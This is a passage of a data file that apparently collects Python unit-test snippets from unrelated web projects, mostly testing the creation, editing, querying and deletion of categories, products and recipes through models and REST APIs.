self.dashboard()\n self.category('Breakfast')\n self.dashboard()\n rv = self.edit_category('JunkFood')\n self.assertIn(b'Category successfully updated', rv.data)", "def test_add_category_to_asset(self):\n pass", "def test_0005_create_categories(self):\n self.create_category(name='Test 0060 Workflow Features', description='Test 0060 - Workflow Features')", "def test_find_by_category(self):\n Pet(0, \"fido\", \"dog\").save()\n Pet(0, \"kitty\", \"cat\").save()\n pets = Pet.find_by_category(\"cat\")\n self.assertNotEqual(len(pets), 0)\n self.assertEqual(pets[0].category, \"cat\")\n self.assertEqual(pets[0].name, \"kitty\")", "def test_category_mixed_on_edit(self):\n self.go200('minus_upload')\n self.formfile('minus_upload', 'file', AUDIO_FILE)\n self.fv('minus_upload', 'categories', 'onecat')\n self.submit200()\n minus = MinusRecord.objects.all()[0]\n self.assert_equal(minus.categories.count(), 1)\n self.go200('minus_edit', [self.superuser, minus.id])\n self.fv('minus_upload', 'add_category', 'yuppie')\n self.submit200()\n self.assert_equal(minus.categories.count(), 2)\n self.assert_equal(minus.categories.all()[0].name, 'onecat')\n self.assert_equal(minus.categories.all()[1].name, 'yuppie')", "def test_update_category(self):\n self.update_success(self.test_data['pants'], self.test_data['shirts'])", "def test_new_category_is_added(db_session):\n new_cat = Category(\n label=\"test_label\",\n desc=\"test_desc\"\n )\n db_session.add(new_cat)\n query = db_session.query(Category).all()\n assert len(query) == 1", "def test_products_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data, Product))\n self.assertEqual(str(data), 'django beginners')", "def test_products_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data, Recipe))\n self.assertEqual(str(data), 'django beginners')", "def test_Categories_getter(self):\r\n expected = ['Treatment', 'DOB']\r\n observed = self.cs_overview.Categories\r\n self.assertEqual(observed, expected)", "def create_category():\n category = Category(name='testcategory', description=\"\", fee=DEFAULT_FEE)\n category.save()\n return category", 
"def test_category_manip_pipeline(self):\n raise NotImplementedError(\"\")", "def test_update_category(self):\n category = sample_category()\n url = category_details_url(category.id)\n self.client.put(url, {\"name\": \"school\"})\n category.refresh_from_db()\n self.assertEqual(category.name, 'school')", "def test_query_category(self):\r\n CategoryFactory.create(name='thinking', short_name='thinking')\r\n # Test for real field\r\n url = \"/api/category\"\r\n res = self.app.get(url + \"?short_name=thinking\")\r\n data = json.loads(res.data)\r\n # Should return one result\r\n assert len(data) == 1, data\r\n # Correct result\r\n assert data[0]['short_name'] == 'thinking', data\r\n\r\n # Valid field but wrong value\r\n res = self.app.get(url + \"?short_name=wrongvalue\")\r\n data = json.loads(res.data)\r\n assert len(data) == 0, data\r\n\r\n # Multiple fields\r\n res = self.app.get(url + '?short_name=thinking&name=thinking')\r\n data = json.loads(res.data)\r\n # One result\r\n assert len(data) == 1, data\r\n # Correct result\r\n assert data[0]['short_name'] == 'thinking', data\r\n assert data[0]['name'] == 'thinking', data\r\n\r\n # Limits\r\n res = self.app.get(url + \"?limit=1\")\r\n data = json.loads(res.data)\r\n for item in data:\r\n assert item['short_name'] == 'thinking', item\r\n assert len(data) == 1, data\r\n\r\n # Errors\r\n res = self.app.get(url + \"?something\")\r\n err = json.loads(res.data)\r\n err_msg = \"AttributeError exception should be raised\"\r\n res.status_code == 415, err_msg\r\n assert res.status_code == 415, err_msg\r\n assert err['action'] == 'GET', err_msg\r\n assert err['status'] == 'failed', err_msg\r\n assert err['exception_cls'] == 'AttributeError', err_msg", "def test_put_category(self):\n self.assertEqual(Project.objects.count(), 2)\n\n url = reverse(\n 'projectroles:api_project_update',\n kwargs={'project': self.category.sodar_uuid},\n )\n put_data = {\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': '',\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n }\n response = self.request_knox(url, method='PUT', data=put_data)\n\n self.assertEqual(response.status_code, 200, msg=response.content)\n self.assertEqual(Project.objects.count(), 2)\n\n self.category.refresh_from_db()\n model_dict = model_to_dict(self.category)\n model_dict['readme'] = model_dict['readme'].raw\n expected = {\n 'id': self.category.pk,\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n 'archive': False,\n 'full_title': UPDATED_TITLE,\n 'has_public_children': False,\n 'sodar_uuid': self.category.sodar_uuid,\n }\n self.assertEqual(model_dict, expected)\n\n expected = {\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.category.get_owner().sodar_uuid): {\n 'role': PROJECT_ROLE_OWNER,\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'inherited': False,\n 'sodar_uuid': str(self.category.get_owner().sodar_uuid),\n }\n },\n 'sodar_uuid': str(self.category.sodar_uuid),\n }\n self.assertEqual(json.loads(response.content), expected)", "def test_add_category_success(self):\n category = json.dumps({\n 'name': 'Asian',\n })\n response = self.client.post('/category', data=category,\n headers={\"Authorization\": self.token})\n 
self.assertEqual(response.status_code, 201)\n self.assertIn('asian', response.data.decode())", "def test_get_categories(self):\n pass", "def test_create_category(self):\n self.assertEqual(Project.objects.count(), 2)\n\n url = reverse('projectroles:api_project_create')\n post_data = {\n 'title': NEW_CATEGORY_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': '',\n 'description': 'description',\n 'readme': 'readme',\n 'public_guest_access': False,\n 'owner': str(self.user.sodar_uuid),\n }\n response = self.request_knox(url, method='POST', data=post_data)\n\n self.assertEqual(response.status_code, 201, msg=response.content)\n self.assertEqual(Project.objects.count(), 3)\n # Assert object content\n new_category = Project.objects.get(title=NEW_CATEGORY_TITLE)\n model_dict = model_to_dict(new_category)\n model_dict['readme'] = model_dict['readme'].raw\n expected = {\n 'id': new_category.pk,\n 'title': new_category.title,\n 'type': new_category.type,\n 'parent': None,\n 'description': new_category.description,\n 'readme': new_category.readme.raw,\n 'public_guest_access': False,\n 'archive': False,\n 'full_title': new_category.title,\n 'has_public_children': False,\n 'sodar_uuid': new_category.sodar_uuid,\n }\n self.assertEqual(model_dict, expected)\n # Assert role assignment\n self.assertEqual(\n RoleAssignment.objects.filter(\n project=new_category, user=self.user, role=self.role_owner\n ).count(),\n 1,\n )\n # Assert API response\n expected = {\n 'title': NEW_CATEGORY_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': new_category.description,\n 'readme': new_category.readme.raw,\n 'public_guest_access': False,\n 'sodar_uuid': str(new_category.sodar_uuid),\n }\n self.assertEqual(json.loads(response.content), expected)", "def setUpTestData(cls):\n Product_type.objects.create(\n name='New_Product', display_name='New Product.')", "def sample_category(name='place'):\n return Category.objects.create(name=name)", "def test_products_basic(self):\n self.assertEqual(self.cat1.name, 'meat')\n self.assertEqual(self.cat1.slug, 'meat')\n self.assertEqual(self.cat1.description, 'The meat category.')\n self.assertIsNone(self.cat1.parent)\n\n self.assertEqual(len(self.product1.categories.all()), 1)\n self.assertEqual(self.product1.categories.all()[0], self.cat1)\n self.assertEqual(self.product1.name, 'Chicken Breast')\n self.assertEqual(self.product1.slug, 'chicken-breast')\n self.assertIn('product1_img', self.product1.main_image.image.name)\n self.assertEqual(self.product1.description, \n 'Chicken breast. 
Yes, chicken breast.')\n self.assertEqual(self.product1.stock, 120)\n self.assertTrue(self.product1.available)\n\n self.assertEqual(self.product1.main_image_url, \n self.product1.main_image.image.url,\n '\\'main_image_url\\' shorthand in Product model did not match the ' \n 'actual main image url')\n \n # Test adding multiple categories to a product \n high_protein = self.product1.categories.create(name='high protein',\n slug='high-protein',\n description='Hight protein foods.',\n parent=self.cat1)\n\n self.assertEqual(len(self.product1.categories.all()), 2)\n self.assertIn(high_protein, self.product1.categories.all())\n self.assertEqual(high_protein.parent, self.cat1)\n\n # Test __str()__ returns expected name\n self.assertEqual(str(self.product1), 'Chicken Breast')\n self.assertEqual(str(self.cat1), 'meat')\n\n # Make sure the urls are returned correctly\n self.assertEqual(self.product1.get_absolute_url(), \n reverse('products:product_detail', \n kwargs= {'slug': self.product1.slug}))", "def test_retrieve_categories(self):\n sample_category()\n sample_category(name=\"people\")\n res = self.client.get(CATEGORY_URL)\n categories = Category.objects.all()\n serializer = CategorySerializer(categories, many=True)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(len(res.data), len(serializer.data))\n self.assertEqual(res.data, serializer.data)", "def test_new_attribute_data(db_session):\n new_att = Attribute(\n label=\"test_label\",\n desc=\"test_desc\"\n )\n db_session.add(new_att)\n att = db_session.query(Attribute).all()\n assert att[0].label == \"test_label\"\n assert att[0].desc == \"test_desc\"", "def test_categories_add(self):\n categories = [category.category for category in self.note.categories.all()]\n self.assertIn('test', categories)\n self.assertNotIn('note', categories)", "def test_category_field(self):\n field = self.record.find('field[@name=\\'category_id\\']')\n self.assertEqual(field.attrib['eval'],\n '[(4, ref(\\'nh_clinical.role_nhc_admin\\'))]',\n 'Incorrect eval on category id')", "def test_delete_category(self):\n pass", "def test_save(self, init_db, category1):\n params = {\n 'title' : fake.alphanumeric(15),\n 'description' : fake.alphanumeric(200),\n 'ranking' : 1,\n 'meta_data' : {\n 'color' : 'red',\n 'quantity' : 2,\n 'date_purchased' : '2019-02-05',\n 'condition' : 'bad'\n },\n 'category_id' : category1.id\n }\n\n favorite = Favorite(**params)\n assert favorite == favorite.save()", "def test_edit_category(self):\n rv = self.client().post(\n '/categories/',\n data={'category_name': 'Sauces'})\n self.assertEqual(rv.status_code, 201)\n rv = self.client().put(\n '/categories/1',\n data={\n \"name\": \"Soups and Sauces\"\n })\n #self.assertEqual(rv.status_code, 200)\n results = self.client().get('/categories/1')\n #self.assertIn('Soups and', str(results.data))", "def test_create_category_nested(self):\n self.assertEqual(Project.objects.count(), 2)\n\n url = reverse('projectroles:api_project_create')\n post_data = {\n 'title': NEW_CATEGORY_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': str(self.category.sodar_uuid),\n 'description': 'description',\n 'readme': 'readme',\n 'public_guest_access': False,\n 'owner': str(self.user.sodar_uuid),\n }\n response = self.request_knox(url, method='POST', data=post_data)\n\n self.assertEqual(response.status_code, 201, msg=response.content)\n self.assertEqual(Project.objects.count(), 3)\n new_category = Project.objects.get(title=NEW_CATEGORY_TITLE)\n model_dict = 
model_to_dict(new_category)\n model_dict['readme'] = model_dict['readme'].raw\n expected = {\n 'id': new_category.pk,\n 'title': new_category.title,\n 'type': new_category.type,\n 'parent': self.category.pk,\n 'description': new_category.description,\n 'readme': new_category.readme.raw,\n 'public_guest_access': False,\n 'archive': False,\n 'full_title': self.category.title + ' / ' + new_category.title,\n 'has_public_children': False,\n 'sodar_uuid': new_category.sodar_uuid,\n }\n self.assertEqual(model_dict, expected)\n self.assertEqual(\n RoleAssignment.objects.filter(\n project=new_category, user=self.user, role=self.role_owner\n ).count(),\n 1,\n )\n expected = {\n 'title': NEW_CATEGORY_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': str(self.category.sodar_uuid),\n 'description': new_category.description,\n 'readme': new_category.readme.raw,\n 'public_guest_access': False,\n 'sodar_uuid': str(new_category.sodar_uuid),\n }\n self.assertEqual(json.loads(response.content), expected)", "def test_create_product_successful(self):\n \n ProductCategory.objects.create(name=\"test name\", description=\"new name\")\n test_key = ProductCategory.objects.values()[0]\n # print(test_key)\n payload = {\n 'name': 'Test Tag',\n 'product_category_id': test_key.get('id'),\n 'unit_price': 100,\n 'quantity': 12,\n 'description': 'Test description'\n }\n \n res = self.client.post(PRODUCT_ADD_URL, payload)\n\n # print(res.data)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)", "def test_23_admin_add_category(self):\r\n self.create()\r\n category = {'name': 'cat', 'short_name': 'cat',\r\n 'description': 'description'}\r\n # Anonymous user\r\n url = '/admin/categories'\r\n res = self.app.post(url, data=category, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Anonymous users should be redirected to sign in\"\r\n assert dom.find(id='signin') is not None, err_msg\r\n\r\n # Authenticated user but not admin\r\n self.signin(email=self.email_addr2, password=self.password)\r\n res = self.app.post(url, data=category, follow_redirects=True)\r\n err_msg = \"Non-Admin users should get 403\"\r\n assert res.status_code == 403, err_msg\r\n self.signout()\r\n\r\n # Admin\r\n self.signin(email=self.root_addr, password=self.root_password)\r\n res = self.app.post(url, data=category, follow_redirects=True)\r\n err_msg = \"Category should be added\"\r\n assert \"Category added\" in res.data, err_msg\r\n assert category['name'] in res.data, err_msg\r\n\r\n category = {'name': 'cat', 'short_name': 'cat',\r\n 'description': 'description'}\r\n\r\n self.signin(email=self.root_addr, password=self.root_password)\r\n res = self.app.post(url, data=category, follow_redirects=True)\r\n err_msg = \"Category form validation should work\"\r\n assert \"Please correct the errors\" in res.data, err_msg", "def test_valid_form(self):\n\n data = {'category': ['103','109'] }\n form = CategoriesForm(data=data)\n self.assertTrue(form.is_valid())", "def test_photo_classification_view_set_post_category_update_not_allowed(self):\n # Test data\n user = account_models.User.objects.get(email='mrtest@mypapaya.io')\n photo_models.PhotoClassification.objects.create_or_update(name='night', classification_type='category')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'category'\n }\n\n request = 
client.post('/api/photo_classifications', data=payload, format='json')\n\n self.assertEquals(request.status_code, 400)\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 12)", "def test_edit_category(self):\n response = self.client.put('/api/v1/category/1',\n data=json.dumps(category[3]),\n content_type='application/json',\n headers=self.admin_headers)\n self.assertEqual(response.status_code, 201)\n self.assertIn('Apparels', str(response.data))", "def test_add_category_integer_name(self):\n category = json.dumps({\n 'name': 8888,\n })\n response = self.client.post('/category', data=category,\n headers={\"Authorization\": self.token})\n self.assertEqual(response.status_code, 400)\n self.assertIn('Numbers cant be a Name', response.data.decode())", "def test_add_category_to_product(self):\n login = self.autheniticate()\n token = json.loads(login.data.decode()).get('token')\n self.app.post(product_url,\n data=json.dumps(self.product_data),\n headers=dict(Authorization=\"Bearer \" + token),\n content_type='application/json')\n self.app.post(category_url,\n data=json.dumps(self.data),\n headers=dict(Authorization=\"Bearer \" + token),\n content_type='application/json')\n res = self.app.post(productcategory_url,\n headers=dict(Authorization=\"Bearer \" + token),\n content_type='application/json')\n res1 = json.loads(res.data.decode())\n self.assertEqual(res1['status'], 'Updated!')\n self.assertEqual(res.status_code, 200)", "def test_category_url(self):\n data = self.data1\n # response = self.client.post(\n # reverse('recipe:category_list', args=[data.slug]))\n # self.assertEqual(response.status_code, 200)\n self.assertTrue(isinstance(data, Category))", "def fill_in(self,category):\r\n api_json = JsonFromApi(category)\r\n extracted_data = ExtractFromJson(api_json.get_json())\r\n self.fill_in_db = DatabaseUpdator(\r\n extracted_data.extract_json(), self.mydb)\r\n self.fill_in_db.table_product_update()\r\n self.fill_in_db.table_category_update()", "def test_books_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data,Books))", "def test_category(self, category):\n\n importable = False\n try:\n Categories.objects.get(\n name=category['id'].split(':')[1]\n )\n except Categories.DoesNotExist:\n importable = True\n except:\n importable = False\n\n return importable", "def test_project_category_creation(self):\n name = 'A project category name'\n description = 'A project category description'\n project_category = self.create_project_category(\n name=name,\n description=description,\n )\n self.assertTrue(isinstance(project_category, ProjectCategory))\n self.assertEqual(project_category.__str__(), project_category.name)\n self.assertEqual(project_category.name, name)\n self.assertEqual(project_category.description, description)", "def test_get_category_details(self):\n category = sample_category()\n url = category_details_url(category.id)\n res = self.client.get(url)\n serializer = CategorySerializer(category)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)", "def test_add_missing_field(self):\n response = self.client.post('/api/v1/categories',\n data=json.dumps(category[1]),\n content_type='application/json',\n headers=self.admin_headers)\n self.assertEqual(response.status_code, 400)\n self.assertIn('Missing required parameter', str(response.data))", "def test_photo_classification_view_set_post_tag_category_exists(self):\n # Test data\n user = 
account_models.User.objects.get(email='mrtest@mypapaya.io')\n photo_models.PhotoClassification.objects.create_or_update(name='night', classification_type='category')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n self.assertEquals(result['classification_type'], 'tag')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 13)", "def test_view_categories(self):\n res = self.client().post('/categories/', data=self.category)\n self.assertEqual(res.status_code, 201)\n res = self.client().get('/categories/')\n self.assertEqual(res.status_code, 200)\n self.assertIn('Stews', str(res.data))", "def test_create_drug_successful(self):\n generic = models.Generic.objects.create(\n generic_name=\"Lisinopril\"\n )\n print(type(generic))\n drug = models.Drug.objects.create(\n product_id='12345',\n generic_name=generic,\n product_ndc=\"99999-9999\",\n brand_name=\"Zestril\"\n )\n\n self.assertEqual(str(drug), f\"{drug.product_id} {drug.product_ndc}\")", "def test_create(self):\n self.assertEqual(Product.objects.count(), 2)\n payload = {\n 'name': 'New product',\n 'category': self.category_1.id,\n 'sku': '11111111',\n 'description': 'New product description',\n 'price': 39.99\n }\n\n headers = {\n 'HTTP_AUTHORIZATION': 'Token ' + str(self.token_admin)\n }\n response = self.client.post(\n '/api/products/', data=payload, content_type='application/json', **headers)\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response['Content-Type'], 'application/json')\n self.assertEqual(Product.objects.count(), 3)\n\n product = Product.objects.get(name='New product')\n self.assertEqual(product.name, 'New product')\n self.assertEqual(product.category, self.category_1)\n self.assertEqual(product.sku, '11111111')\n self.assertEqual(product.description, 'New product description')\n self.assertEqual(float(product.price), 39.99)", "def test_up_assign_categories(self):\n self.go200('minus_upload')\n self.formfile('minus_upload', 'file', AUDIO_FILE)\n self.fv('minus_upload', 'categories', 'onecat')\n self.submit200()\n minus = MinusRecord.objects.all()[0]\n self.url('minus_detail', [minus.author, minus.id])\n self.assert_equal(minus.categories.count(), 1)\n self.assert_equal(minus.categories.all()[0].name, 'onecat')", "def test_get_category_forms(self):\n self.get_add_form()\n self.get_edit_form(self.test_data['pants'])\n self.get_delete_confirmation_form(self.test_data['shirts'])", "def test_can_create_job_category(self):\n\t\tself.job_category.save()\n\t\tjob_category_instance = JobCategory.objects.get(pk=1)\n\t\tself.assertEqual(\n\t\t\tself.category,\n\t\t\tjob_category_instance.category,\n\t\t\t\"Job categories don't match.\"\n\t\t)", "def test_prep_new_data(self):\n pass", "def test_recipe_model(self):\n recipe = Recipe(uri=\"testuri\", name=\"testname\", image_url=\"test_image_url\")\n\n db.session.add(recipe)\n db.session.commit()\n\n recipes = Recipe.query.all()\n\n self.assertEqual(len(recipes), 1)\n self.assertEqual(recipes[0].uri, \"testuri\")\n self.assertEqual(recipes[0].name, \"testname\")\n self.assertEqual(recipes[0].image_url, \"test_image_url\")", "def 
test_category_post(self):\r\n admin = UserFactory.create()\r\n user = UserFactory.create()\r\n name = u'Category'\r\n category = dict(\r\n name=name,\r\n short_name='category',\r\n description=u'description')\r\n data = json.dumps(category)\r\n # no api-key\r\n url = '/api/category'\r\n res = self.app.post(url, data=data)\r\n err = json.loads(res.data)\r\n err_msg = 'Should not be allowed to create'\r\n assert res.status_code == 401, err_msg\r\n assert err['action'] == 'POST', err_msg\r\n assert err['exception_cls'] == 'Unauthorized', err_msg\r\n\r\n # now a real user but not admin\r\n res = self.app.post(url + '?api_key=' + user.api_key, data=data)\r\n err = json.loads(res.data)\r\n err_msg = 'Should not be allowed to create'\r\n assert res.status_code == 403, err_msg\r\n assert err['action'] == 'POST', err_msg\r\n assert err['exception_cls'] == 'Forbidden', err_msg\r\n\r\n # now as an admin\r\n res = self.app.post(url + '?api_key=' + admin.api_key,\r\n data=data)\r\n err = json.loads(res.data)\r\n err_msg = 'Admin should be able to create a Category'\r\n assert res.status_code == 200, err_msg\r\n cat = db.session.query(Category)\\\r\n .filter_by(short_name=category['short_name']).first()\r\n assert err['id'] == cat.id, err_msg\r\n assert err['name'] == category['name'], err_msg\r\n assert err['short_name'] == category['short_name'], err_msg\r\n assert err['description'] == category['description'], err_msg\r\n\r\n # test re-create should fail\r\n res = self.app.post(url + '?api_key=' + admin.api_key,\r\n data=data)\r\n err = json.loads(res.data)\r\n assert res.status_code == 415, err\r\n assert err['status'] == 'failed', err\r\n assert err['action'] == 'POST', err\r\n assert err['exception_cls'] == \"IntegrityError\", err\r\n\r\n # test create with non-allowed fields should fail\r\n data = dict(name='fail', short_name='fail', wrong=15)\r\n res = self.app.post(url + '?api_key=' + admin.api_key,\r\n data=data)\r\n err = json.loads(res.data)\r\n err_msg = \"ValueError exception should be raised\"\r\n assert res.status_code == 415, err\r\n assert err['action'] == 'POST', err\r\n assert err['status'] == 'failed', err\r\n assert err['exception_cls'] == \"ValueError\", err_msg\r\n # Now with a JSON object but not valid\r\n data = json.dumps(data)\r\n res = self.app.post(url + '?api_key=' + user.api_key,\r\n data=data)\r\n err = json.loads(res.data)\r\n err_msg = \"TypeError exception should be raised\"\r\n assert err['action'] == 'POST', err_msg\r\n assert err['status'] == 'failed', err_msg\r\n assert err['exception_cls'] == \"TypeError\", err_msg\r\n assert res.status_code == 415, err_msg\r\n\r\n # test update\r\n data = {'name': 'My New Title'}\r\n datajson = json.dumps(data)\r\n ## anonymous\r\n res = self.app.put(url + '/%s' % cat.id,\r\n data=data)\r\n error_msg = 'Anonymous should not be allowed to update'\r\n assert_equal(res.status, '401 UNAUTHORIZED', error_msg)\r\n error = json.loads(res.data)\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'PUT', error\r\n assert error['exception_cls'] == 'Unauthorized', error\r\n\r\n ### real user but not allowed as not admin!\r\n url = '/api/category/%s?api_key=%s' % (cat.id, user.api_key)\r\n res = self.app.put(url, data=datajson)\r\n error_msg = 'Should not be able to update apps of others'\r\n assert_equal(res.status, '403 FORBIDDEN', error_msg)\r\n error = json.loads(res.data)\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'PUT', error\r\n assert error['exception_cls'] == 'Forbidden', 
error\r\n\r\n # Now as an admin\r\n res = self.app.put('/api/category/%s?api_key=%s' % (cat.id, admin.api_key),\r\n data=datajson)\r\n assert_equal(res.status, '200 OK', res.data)\r\n out2 = db.session.query(Category).get(cat.id)\r\n assert_equal(out2.name, data['name'])\r\n out = json.loads(res.data)\r\n assert out.get('status') is None, error\r\n assert out.get('id') == cat.id, error\r\n\r\n # With fake data\r\n data['algo'] = 13\r\n datajson = json.dumps(data)\r\n res = self.app.put('/api/category/%s?api_key=%s' % (cat.id, admin.api_key),\r\n data=datajson)\r\n err = json.loads(res.data)\r\n assert res.status_code == 415, err\r\n assert err['status'] == 'failed', err\r\n assert err['action'] == 'PUT', err\r\n assert err['exception_cls'] == 'TypeError', err\r\n\r\n # With not JSON data\r\n datajson = data\r\n res = self.app.put('/api/category/%s?api_key=%s' % (cat.id, admin.api_key),\r\n data=datajson)\r\n err = json.loads(res.data)\r\n assert res.status_code == 415, err\r\n assert err['status'] == 'failed', err\r\n assert err['action'] == 'PUT', err\r\n assert err['exception_cls'] == 'ValueError', err\r\n\r\n # With wrong args in the URL\r\n data = dict(\r\n name='Category3',\r\n short_name='category3',\r\n description=u'description3')\r\n\r\n datajson = json.dumps(data)\r\n res = self.app.put('/api/category/%s?api_key=%s&search=select1' % (cat.id, admin.api_key),\r\n data=datajson)\r\n err = json.loads(res.data)\r\n assert res.status_code == 415, err\r\n assert err['status'] == 'failed', err\r\n assert err['action'] == 'PUT', err\r\n assert err['exception_cls'] == 'AttributeError', err\r\n\r\n # test delete\r\n ## anonymous\r\n res = self.app.delete(url + '/%s' % cat.id, data=data)\r\n error_msg = 'Anonymous should not be allowed to delete'\r\n assert_equal(res.status, '401 UNAUTHORIZED', error_msg)\r\n error = json.loads(res.data)\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'DELETE', error\r\n assert error['target'] == 'category', error\r\n ### real user but not admin\r\n url = '/api/category/%s?api_key=%s' % (cat.id, user.api_key)\r\n res = self.app.delete(url, data=datajson)\r\n error_msg = 'Should not be able to delete apps of others'\r\n assert_equal(res.status, '403 FORBIDDEN', error_msg)\r\n error = json.loads(res.data)\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'DELETE', error\r\n assert error['target'] == 'category', error\r\n\r\n # As admin\r\n url = '/api/category/%s?api_key=%s' % (cat.id, admin.api_key)\r\n res = self.app.delete(url, data=datajson)\r\n\r\n assert_equal(res.status, '204 NO CONTENT', res.data)\r\n\r\n # delete a category that does not exist\r\n url = '/api/category/5000?api_key=%s' % admin.api_key\r\n res = self.app.delete(url, data=datajson)\r\n error = json.loads(res.data)\r\n assert res.status_code == 404, error\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'DELETE', error\r\n assert error['target'] == 'category', error\r\n assert error['exception_cls'] == 'NotFound', error\r\n\r\n # delete a category that does not exist\r\n url = '/api/category/?api_key=%s' % admin.api_key\r\n res = self.app.delete(url, data=datajson)\r\n assert res.status_code == 404, error", "def test_category_addition(self):\n login = self.autheniticate()\n token = json.loads(login.data.decode()).get('token')\n res = self.app.post(category_url,\n data=json.dumps(self.data),\n headers=dict(Authorization=\"Bearer \" + token),\n content_type='application/json')\n res1 = 
json.loads(res.data.decode())\n self.assertEqual(res1['status'], 'Success!')\n self.assertEqual(res.status_code, 201)", "def test_patch_category(self):\n self.assertEqual(Project.objects.count(), 2)\n\n url = reverse(\n 'projectroles:api_project_update',\n kwargs={'project': self.category.sodar_uuid},\n )\n patch_data = {\n 'title': UPDATED_TITLE,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n }\n response = self.request_knox(url, method='PATCH', data=patch_data)\n\n self.assertEqual(response.status_code, 200, msg=response.content)\n self.assertEqual(Project.objects.count(), 2)\n\n self.category.refresh_from_db()\n model_dict = model_to_dict(self.category)\n model_dict['readme'] = model_dict['readme'].raw\n expected = {\n 'id': self.category.pk,\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n 'archive': False,\n 'full_title': UPDATED_TITLE,\n 'has_public_children': False,\n 'sodar_uuid': self.category.sodar_uuid,\n }\n self.assertEqual(model_dict, expected)\n self.assertEqual(self.category.get_owner().user, self.user_owner_cat)\n\n expected = {\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.category.get_owner().sodar_uuid): {\n 'role': PROJECT_ROLE_OWNER,\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'inherited': False,\n 'sodar_uuid': str(self.category.get_owner().sodar_uuid),\n }\n },\n 'sodar_uuid': str(self.category.sodar_uuid),\n }\n self.assertEqual(json.loads(response.content), expected)", "def test_cat_says(self):\n cat = models.Cat(name='Garfield')\n self.assertEqual(cat.says(), 'meow')", "def test_create_new_recipe(self):\n payload = {\n 'title': 'Cheescake',\n 'time_taken': 35,\n 'price': 5\n }\n\n res = self.client.post(RECIPE_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n recipe = Recipe.objects.get(id=res.data['id'])\n for key in payload.keys():\n self.assertEqual((payload)[key], getattr(recipe, key))\n\n # recipe = get_sample_recipe(self.sample_user)\n # db_recipe =\n\n # self.assertEqual(recipe.title, )", "def test_create_category_with_existing_name(self):\n sample_category()\n res = self.client.post(CATEGORY_URL, {\"name\": \"place\"})\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(\n res.data['errors']['name'][0],\n 'This field must be unique.')", "def add_categorization(item_uuid, category_name, category_type):\n try:\n record_to_insert = (item_uuid, category_name, category_type)\n cursor = db.get_cursor()\n cursor.execute('INSERT INTO categorization VALUES (%s, %s, %s);', record_to_insert)\n db.get_db().commit()\n\n return {'row_count': cursor.rowcount, 'status': 'Record inserted successfuly into categorization table', 'error': ''}\n except (Exception, psycopg2.Error) as error:\n return {'row_count': 0, \"status\": \"error\", \"error\": error}", "def test_add_relation_type(self):\n pass", "def test_create_post(self):\n self.test_category = Category.objects.create(name='django')\n self.testuser1 = User.objects.create_superuser(\n username='test_user1', password='123456789')\n # self.testuser1.is_staff = True\n\n self.client.login(username=self.testuser1.username,\n password='123456789')\n\n data = {\"title\": \"new\", \"author\": 1,\n \"excerpt\": \"new\", \"content\": \"new\"}\n url = 
